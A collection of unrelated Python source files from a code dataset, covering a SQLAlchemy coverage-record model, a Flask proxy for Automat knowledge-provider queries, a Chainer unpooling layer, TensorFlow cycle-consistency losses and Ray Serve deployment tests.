SUMMARY_OPERATION = u'summary'
QUALITY_OPERATION = u'quality'
GENERATE_OPDS_OPERATION = u'generate-opds'
GENERATE_MARC_OPERATION = u'generate-marc'
UPDATE_SEARCH_INDEX_OPERATION = u'update-search-index'
id = Column(Integer, primary_key=True)
work_id = Column(Integer, ForeignKey('works.id'), index=True)
operation = Column(String(255), index=True, default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
__table_args__ = (
UniqueConstraint('work_id', 'operation'),
)
def __repr__(self):
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
template = '<WorkCoverageRecord: work_id=%s operation="%s" timestamp="%s"%s>'
return template % (
self.work_id, self.operation,
self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
exception
)
@classmethod
def lookup(self, work, operation):
_db = Session.object_session(work)
return get_one(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, work, operation, timestamp=None,
status=CoverageRecord.SUCCESS):
_db = Session.object_session(work)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, WorkCoverageRecord,
work=work,
operation=operation,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(self, works, operation, timestamp=None,
status=CoverageRecord.SUCCESS, exception=None):
"""Create and update WorkCoverageRecords so that every Work in
`works` has an identical record.
"""
from work import Work
if not works:
# Nothing to do.
return
_db = Session.object_session(works[0])
timestamp = timestamp or datetime.datetime.utcnow()
work_ids = [w.id for w in works]
# Make sure that works that previously had a
# WorkCoverageRecord for this operation have their timestamp
# and status updated.
update = WorkCoverageRecord.__table__.update().where(
and_(WorkCoverageRecord.work_id.in_(work_ids),
WorkCoverageRecord.operation==operation)
).values(dict(timestamp=timestamp, status=status, exception=exception))
_db.execute(update)
# Make sure that any works that are missing a
# WorkCoverageRecord for this operation get one.
# Works that already have a WorkCoverageRecord will be ignored
# by the INSERT but handled by the UPDATE.
already_covered = _db.query(WorkCoverageRecord.work_id).select_from(
WorkCoverageRecord).filter(
WorkCoverageRecord.work_id.in_(work_ids)
).filter(
WorkCoverageRecord.operation==operation
)
# The SELECT part of the INSERT...SELECT query.
new_records = _db.query(
Work.id.label('work_id'),
literal(operation, type_=String(255)).label('operation'),
literal(timestamp, type_=DateTime).label('timestamp'),
literal(status, type_=BaseCoverageRecord.status_enum).label('status')
).select_from(
Work
)
new_records = new_records.filter(
Work.id.in_(work_ids)
).filter(
~Work.id.in_(already_covered)
)
# The INSERT part.
insert = WorkCoverageRecord.__table__.insert().from_select(
[
literal_column('work_id'),
literal_column('operation'),
literal_column('timestamp'),
literal_column('status'),
],
new_records
)
_db.execute(insert)
Index("ix_workcoveragerecords_operation_work_id", WorkCoverageRecord.operation, WorkCoverageRecord.work_id)
|
the-stack_0_6265 | import copy
import json
import requests
from flask import request
from tranql.backplane.api.standard_api import StandardAPIResource
from tranql.config import config
#######################################################
##
# Automat - query Automat-KPs.
##
#######################################################
class AutomatResource(StandardAPIResource):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.url = config.get("AUTOMAT_URL")
def get_kp_reasoner_api(self, kp_tag):
return f'{self.url}/{kp_tag}/query'
def get_kp_schema_api(self, kp_tag):
return f'{self.url}/{kp_tag}/predicates'
class AutomatSchema(AutomatResource):
def get(self, kp_tag):
"""
Automat Schema
---
tags: [schema]
description: Query schema of kp in automat
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
responses:
'200':
description: Schema
content:
application/json:
schema:
type: object
example:
population_of_individual_organisms:
phenotypic_feature:
- association
named_thing:
- association
activity_and_behavior:
- association
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'"""
url = self.get_kp_schema_api(kp_tag)
response = requests.get(url)
if response.status_code != 200 :
result = {
"status": "error",
"code": "service_invocation_error",
"message": f"Bad Automat response. When getting schema. url: {self.url} \n request: {json.dumps(request.json, indent=2)} "
f"response: \n{response.text}."
}
return result, 500
else:
return response.json()
class AutomatQuery(AutomatResource):
""" Generic graph query to Gamma. """
def post(self, kp_tag):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
parameters:
- in: path
name: kp_tag
schema:
type: string
example: uberon
required: true
description: KP identifier to get data from.
requestBody:
description: Input message
required: true
content:
application/json:
schema:
$ref: '#/definitions/Message'
example:
knowledge_graph:
nodes: []
edges: []
knowledge_maps:
- {}
question_graph:
nodes:
- id: "chemical_substance"
type: "chemical_substance"
curie: "CHEMBL:CHEMBL3"
- id: "disease"
type: "disease"
edges:
- id: "e1"
source_id: "chemical_substance"
target_id: "disease"
options: {}
responses:
'200':
description: Message
content:
application/json:
schema:
$ref: '#/definitions/Message'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
self.validate (request, 'Message')
url = self.get_kp_reasoner_api(kp_tag)
# question_graph should be query graph
question = request.json
question['query_graph'] = copy.deepcopy(question['question_graph'])
del question['question_graph']
del question['knowledge_graph']
del question['knowledge_maps']
response = requests.post(url, json={"message": question})
if response.status_code >= 300:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
else:
result = self.down_cast_message(response.json())
return self.response(result)
class AutomatRegistry(AutomatResource):
def get(self):
"""
Automat query
---
tags: [query]
description: Query the Automat KPs.
responses:
'200':
description: Message
content:
application/json:
schema:
- 'intact'
- 'ctd'
'500':
description: An error was encountered
content:
application/json:
schema:
$ref: '#/definitions/Error'
"""
response = requests.get(self.url + '/registry')
if response.status_code == 200:
return response.json()
else:
result = {
"status": "error",
"code": "service_invocation_failure",
"message": f"Bad Automat response. Contacting registry url: {self.url} \n request: "
f"{json.dumps(request.json, indent=2)} response: \n{response.text}."
}
return result
|
the-stack_0_6269 | from chainer import cuda
from chainer.functions.pooling import pooling_2d
from chainer.utils import conv
from chainer.utils import type_check
class Unpooling2D(pooling_2d.Pooling2D):
"""Unpooling over a set of 2d planes."""
def __init__(self, ksize, stride=None, pad=0,
outsize=None, cover_all=True):
super(Unpooling2D, self).__init__(ksize, stride, pad, cover_all)
self.outh, self.outw = (None, None) if outsize is None else outsize
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(n_in == 1)
x_type = in_types[0]
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim == 4,
)
if self.outh is not None:
expected_h = conv.get_conv_outsize(
self.outh, self.kh, self.sy, self.ph, cover_all=self.cover_all)
type_check.expect(x_type.shape[2] == expected_h)
if self.outw is not None:
expected_w = conv.get_conv_outsize(
self.outw, self.kw, self.sx, self.pw, cover_all=self.cover_all)
type_check.expect(x_type.shape[3] == expected_w)
def forward(self, x):
h, w = x[0].shape[2:]
if self.outh is None:
self.outh = conv.get_deconv_outsize(
h, self.kh, self.sy, self.ph, cover_all=self.cover_all)
if self.outw is None:
self.outw = conv.get_deconv_outsize(
w, self.kw, self.sx, self.pw, cover_all=self.cover_all)
xp = cuda.get_array_module(*x)
col = xp.tile(x[0][:, :, xp.newaxis, xp.newaxis],
(1, 1, self.kh, self.kw, 1, 1))
if isinstance(x[0], cuda.ndarray):
y = conv.col2im_gpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
else:
y = conv.col2im_cpu(col, self.sy, self.sx, self.ph, self.pw,
self.outh, self.outw)
return y,
def backward(self, x, gy):
if isinstance(gy[0], cuda.ndarray):
gcol = conv.im2col_gpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
else:
gcol = conv.im2col_cpu(
gy[0], self.kh, self.kw, self.sy, self.sx, self.ph, self.pw,
cover_all=self.cover_all)
gx = gcol.sum(axis=(2, 3))
return gx,
def unpooling_2d(x, ksize, stride=None, pad=0, outsize=None, cover_all=True):
"""Inverse operation of pooling for 2d array.
This function acts similarly to :class:`~functions.Deconvolution2D`, but
it spreads input 2d array's value without any parameter instead of
computing the inner products.
Args:
x (~chainer.Variable): Input variable.
ksize (int or pair of ints): Size of pooling window. ``ksize=k`` and
``ksize=(k, k)`` are equivalent.
stride (int, pair of ints or None): Stride of pooling applications.
``stride=s`` and ``stride=(s, s)`` are equivalent. If ``None`` is
specified, then it uses same stride as the pooling window size.
pad (int or pair of ints): Spatial padding width for the input array.
``pad=p`` and ``pad=(p, p)`` are equivalent.
outsize (None or pair of ints): Expected output size (height, width)
of array after the operation. If ``None``, the size
(height or width) is estimated from the size of input array
in first batch with
:func:`~chainer.utils.conv.get_deconv_outsize`.
If outsize is not ``None``, the result of outsize applied to
:func:`~chainer.utils.conv.get_conv_outsize` must be equal to
the shape of the 2d array in the input batch ``x``.
cover_all (bool): If ``True``, all spatial locations are pooled
into some output pixels, and the output size is larger than that
when cover_all is ``False``.
Returns:
~chainer.Variable: Output variable.
"""
return Unpooling2D(ksize, stride, pad, outsize, cover_all)(x)
|
the-stack_0_6270 | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Loss functions imposing the cycle-consistency constraints."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v2 as tf
def classification_loss(logits, labels, label_smoothing):
"""Loss function based on classifying the correct indices.
In the paper, this is called Cycle-back Classification.
Args:
logits: Tensor, Pre-softmax scores used for classification loss. These are
similarity scores after cycling back to the starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
label_smoothing: Float, label smoothing factor which can be used to
determine how hard the alignment should be.
Returns:
loss: Tensor, A scalar classification loss calculated using standard softmax
cross-entropy loss.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
return tf.reduce_mean(tf.keras.losses.categorical_crossentropy(
y_true=labels, y_pred=logits, from_logits=True,
label_smoothing=label_smoothing))
def regression_loss(logits, labels, num_steps, steps, seq_lens, loss_type,
normalize_indices, variance_lambda, huber_delta):
"""Loss function based on regressing to the correct indices.
In the paper, this is called Cycle-back Regression. There are 3 variants
of this loss:
i) regression_mse: MSE of the predicted indices and ground truth indices.
ii) regression_mse_var: MSE of the predicted indices that takes into account
the variance of the similarities. This is important when the rate at which
sequences go through different phases changes a lot. The variance scaling
allows dynamic weighting of the MSE loss based on the similarities.
iii) regression_huber: Huber loss between the predicted indices and ground
truth indices.
Args:
logits: Tensor, Pre-softmax similarity scores after cycling back to the
starting sequence.
labels: Tensor, One hot labels containing the ground truth. The index where
the cycle started is 1.
num_steps: Integer, Number of steps in the sequence embeddings.
steps: Tensor, step indices/frame indices of the embeddings of the shape
[N, T] where N is the batch size, T is the number of the timesteps.
seq_lens: Tensor, Lengths of the sequences from which the sampling was done.
This can provide additional temporal information to the alignment loss.
loss_type: String, This specifies the kind of regression loss function.
Currently supported loss functions: regression_mse, regression_mse_var,
regression_huber.
normalize_indices: Boolean, If True, normalizes indices by sequence lengths.
Useful for ensuring numerical instabilities don't arise as sequence
indices can be large numbers.
variance_lambda: Float, Weight of the variance of the similarity
predictions while cycling back. If this is high then the low variance
similarities are preferred by the loss while making this term low results
in high variance of the similarities (more uniform/random matching).
huber_delta: float, Huber delta described in tf.keras.losses.huber_loss.
Returns:
loss: Tensor, A scalar loss calculated using a variant of regression.
"""
# Just to be safe, we stop gradients from labels as we are generating labels.
labels = tf.stop_gradient(labels)
steps = tf.stop_gradient(steps)
if normalize_indices:
float_seq_lens = tf.cast(seq_lens, tf.float32)
tile_seq_lens = tf.tile(
tf.expand_dims(float_seq_lens, axis=1), [1, num_steps])
steps = tf.cast(steps, tf.float32) / tile_seq_lens
else:
steps = tf.cast(steps, tf.float32)
beta = tf.nn.softmax(logits)
true_time = tf.reduce_sum(steps * labels, axis=1)
pred_time = tf.reduce_sum(steps * beta, axis=1)
if loss_type in ['regression_mse', 'regression_mse_var']:
if 'var' in loss_type:
# Variance aware regression.
pred_time_tiled = tf.tile(tf.expand_dims(pred_time, axis=1),
[1, num_steps])
pred_time_variance = tf.reduce_sum(
tf.square(steps - pred_time_tiled) * beta, axis=1)
# Using log of variance as it is numerically stabler.
pred_time_log_var = tf.math.log(pred_time_variance)
squared_error = tf.square(true_time - pred_time)
return tf.reduce_mean(tf.math.exp(-pred_time_log_var) * squared_error
+ variance_lambda * pred_time_log_var)
else:
return tf.reduce_mean(
tf.keras.losses.mean_squared_error(y_true=true_time,
y_pred=pred_time))
elif loss_type == 'regression_huber':
return tf.reduce_mean(tf.keras.losses.huber_loss(
y_true=true_time, y_pred=pred_time,
delta=huber_delta))
else:
raise ValueError('Unsupported regression loss %s. Supported losses are: '
'regression_mse, regresstion_mse_var and regression_huber.'
% loss_type)
|
the-stack_0_6271 | import asyncio
import time
import os
import requests
import pytest
import starlette.responses
import ray
from ray import serve
from ray._private.test_utils import SignalActor, wait_for_condition
def test_e2e(serve_instance):
@serve.deployment(name="api")
def function(starlette_request):
return {"method": starlette_request.method}
function.deploy()
resp = requests.get("http://127.0.0.1:8000/api").json()["method"]
assert resp == "GET"
resp = requests.post("http://127.0.0.1:8000/api").json()["method"]
assert resp == "POST"
def test_starlette_response(serve_instance):
@serve.deployment(name="basic")
def basic(_):
return starlette.responses.Response("Hello, world!", media_type="text/plain")
basic.deploy()
assert requests.get("http://127.0.0.1:8000/basic").text == "Hello, world!"
@serve.deployment(name="html")
def html(_):
return starlette.responses.HTMLResponse(
"<html><body><h1>Hello, world!</h1></body></html>"
)
html.deploy()
assert (
requests.get("http://127.0.0.1:8000/html").text
== "<html><body><h1>Hello, world!</h1></body></html>"
)
@serve.deployment(name="plain_text")
def plain_text(_):
return starlette.responses.PlainTextResponse("Hello, world!")
plain_text.deploy()
assert requests.get("http://127.0.0.1:8000/plain_text").text == "Hello, world!"
@serve.deployment(name="json")
def json(_):
return starlette.responses.JSONResponse({"hello": "world"})
json.deploy()
assert requests.get("http://127.0.0.1:8000/json").json()["hello"] == "world"
@serve.deployment(name="redirect")
def redirect(_):
return starlette.responses.RedirectResponse(url="http://127.0.0.1:8000/basic")
redirect.deploy()
assert requests.get("http://127.0.0.1:8000/redirect").text == "Hello, world!"
@serve.deployment(name="streaming")
def streaming(_):
async def slow_numbers():
for number in range(1, 4):
yield str(number)
await asyncio.sleep(0.01)
return starlette.responses.StreamingResponse(
slow_numbers(), media_type="text/plain", status_code=418
)
streaming.deploy()
resp = requests.get("http://127.0.0.1:8000/streaming")
assert resp.text == "123"
assert resp.status_code == 418
def test_deploy_sync_function_no_params(serve_instance):
@serve.deployment()
def sync_d():
return "sync!"
serve.start()
sync_d.deploy()
assert requests.get("http://localhost:8000/sync_d").text == "sync!"
assert ray.get(sync_d.get_handle().remote()) == "sync!"
def test_deploy_async_function_no_params(serve_instance):
@serve.deployment()
async def async_d():
await asyncio.sleep(5)
return "async!"
serve.start()
async_d.deploy()
assert requests.get("http://localhost:8000/async_d").text == "async!"
assert ray.get(async_d.get_handle().remote()) == "async!"
def test_deploy_sync_class_no_params(serve_instance):
@serve.deployment
class Counter:
def __init__(self):
self.count = 0
def __call__(self):
self.count += 1
return {"count": self.count}
serve.start()
Counter.deploy()
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/Counter").json() == {"count": 2}
assert ray.get(Counter.get_handle().remote()) == {"count": 3}
def test_deploy_async_class_no_params(serve_instance):
@serve.deployment
class AsyncCounter:
async def __init__(self):
await asyncio.sleep(5)
self.count = 0
async def __call__(self):
self.count += 1
await asyncio.sleep(5)
return {"count": self.count}
serve.start()
AsyncCounter.deploy()
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 1}
assert requests.get("http://127.0.0.1:8000/AsyncCounter").json() == {"count": 2}
assert ray.get(AsyncCounter.get_handle().remote()) == {"count": 3}
def test_user_config(serve_instance):
@serve.deployment("counter", num_replicas=2, user_config={"count": 123, "b": 2})
class Counter:
def __init__(self):
self.count = 10
def __call__(self, *args):
return self.count, os.getpid()
def reconfigure(self, config):
self.count = config["count"]
Counter.deploy()
handle = Counter.get_handle()
def check(val, num_replicas):
pids_seen = set()
for i in range(100):
result = ray.get(handle.remote())
if str(result[0]) != val:
return False
pids_seen.add(result[1])
return len(pids_seen) == num_replicas
wait_for_condition(lambda: check("123", 2))
Counter = Counter.options(num_replicas=3)
Counter.deploy()
wait_for_condition(lambda: check("123", 3))
Counter = Counter.options(user_config={"count": 456})
Counter.deploy()
wait_for_condition(lambda: check("456", 3))
def test_reject_duplicate_route(serve_instance):
@serve.deployment(name="A", route_prefix="/api")
class A:
pass
A.deploy()
with pytest.raises(ValueError):
A.options(name="B").deploy()
def test_scaling_replicas(serve_instance):
@serve.deployment(name="counter", num_replicas=2)
class Counter:
def __init__(self):
self.count = 0
def __call__(self, _):
self.count += 1
return self.count
Counter.deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
# If the load is shared among two replicas. The max result cannot be 10.
assert max(counter_result) < 10
Counter.options(num_replicas=1).deploy()
counter_result = []
for _ in range(10):
resp = requests.get("http://127.0.0.1:8000/counter").json()
counter_result.append(resp)
# Give some time for a replica to spin down. But majority of the request
# should be served by the only remaining replica.
assert max(counter_result) - min(counter_result) > 6
def test_delete_deployment(serve_instance):
@serve.deployment(name="delete")
def function(_):
return "hello"
function.deploy()
assert requests.get("http://127.0.0.1:8000/delete").text == "hello"
function.delete()
@serve.deployment(name="delete")
def function2(_):
return "olleh"
function2.deploy()
for _ in range(10):
try:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
break
except AssertionError:
time.sleep(0.5) # Wait for the change to propagate.
else:
assert requests.get("http://127.0.0.1:8000/delete").text == "olleh"
def test_starlette_request(serve_instance):
@serve.deployment(name="api")
async def echo_body(starlette_request):
data = await starlette_request.body()
return data
echo_body.deploy()
# Long string to test serialization of multiple messages.
UVICORN_HIGH_WATER_MARK = 65536 # max bytes in one message
long_string = "x" * 10 * UVICORN_HIGH_WATER_MARK
resp = requests.post("http://127.0.0.1:8000/api", data=long_string).text
assert resp == long_string
def test_start_idempotent(serve_instance):
@serve.deployment(name="start")
def func(*args):
pass
func.deploy()
assert "start" in serve.list_deployments()
serve.start(detached=True)
serve.start()
serve.start(detached=True)
serve.start()
assert "start" in serve.list_deployments()
def test_shutdown_destructor(serve_instance):
signal = SignalActor.remote()
@serve.deployment
class A:
def __del__(self):
signal.send.remote()
A.deploy()
A.delete()
ray.get(signal.wait.remote(), timeout=10)
# If the destructor errored, it should be logged but also cleaned up.
@serve.deployment
class B:
def __del__(self):
raise RuntimeError("Opps")
B.deploy()
B.delete()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.